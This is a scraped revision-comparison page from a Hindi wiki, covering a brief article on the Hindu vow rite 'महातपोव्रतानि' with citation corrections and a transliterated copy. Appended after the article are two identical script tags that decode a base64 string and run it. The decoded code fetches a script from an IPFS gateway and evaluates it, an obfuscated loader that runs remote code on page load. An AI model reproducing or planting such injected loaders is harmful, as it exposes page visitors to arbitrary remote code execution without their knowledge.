Difference between revisions of "महातपोव्रतानि"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*भारत में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा ...' के साथ नया पन्ना बनाया)
 
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
 
(3 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
+
*[[भारत]] में धार्मिक व्रतों का सर्वव्यापी प्रचार रहा है। यह हिन्दू धर्म ग्रंथों में उल्लिखित [[हिन्दू धर्म]] का एक व्रत संस्कार है।
*कृत्यकल्पतरु<ref>कृत्यकल्पतरु व्रत॰ 453-469</ref>, हेमाद्रि<ref>हेमाद्रि व्रत॰ 2, 917-931</ref>, कृत्यरत्नाकर<ref>कृत्यरत्नाकर, 540</ref> वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी, 53</ref>व्रत सम्बन्धी कतिपय ग्रन्थों में इस शीर्षक से कतिपय छोटे-मोटे कृत्यों का उल्लेख है।  
+
*कृत्यकल्पतरु<ref>कृत्यकल्पतरु व्रतखण्ड 453-469</ref>, हेमाद्रि<ref>हेमाद्रि व्रतखण्ड 2, 917-931</ref>, कृत्यरत्नाकर<ref>कृत्यरत्नाकर, 540</ref> वर्षक्रियाकौमुदी<ref>वर्षक्रियाकौमुदी, 53</ref>व्रत सम्बन्धी कतिपय ग्रन्थों में इस शीर्षक से कतिपय छोटे-मोटे कृत्यों का उल्लेख है।  
  
{{लेख प्रगति
+
{{संदर्भ ग्रंथ}}
|आधार=आधार1
 
|प्रारम्भिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|शोध=
 
}}
 
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>

Latest revision as of 10:21, 21 March 2011

  • bharat mean dharmik vratoan ka sarvavyapi prachar raha hai. yah hindoo dharm granthoan mean ullikhit hindoo dharm ka ek vrat sanskar hai.
  • krityakalpataru[1], hemadri[2], krityaratnakar[3] varshakriyakaumudi[4]vrat sambandhi katipay granthoan mean is shirshak se katipay chhote-mote krityoan ka ullekh hai.


tika tippani aur sandarbh

  1. krityakalpataru vratakhand 453-469
  2. hemadri vratakhand 2, 917-931
  3. krityaratnakar, 540
  4. varshakriyakaumudi, 53

any sanbandhit liank

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>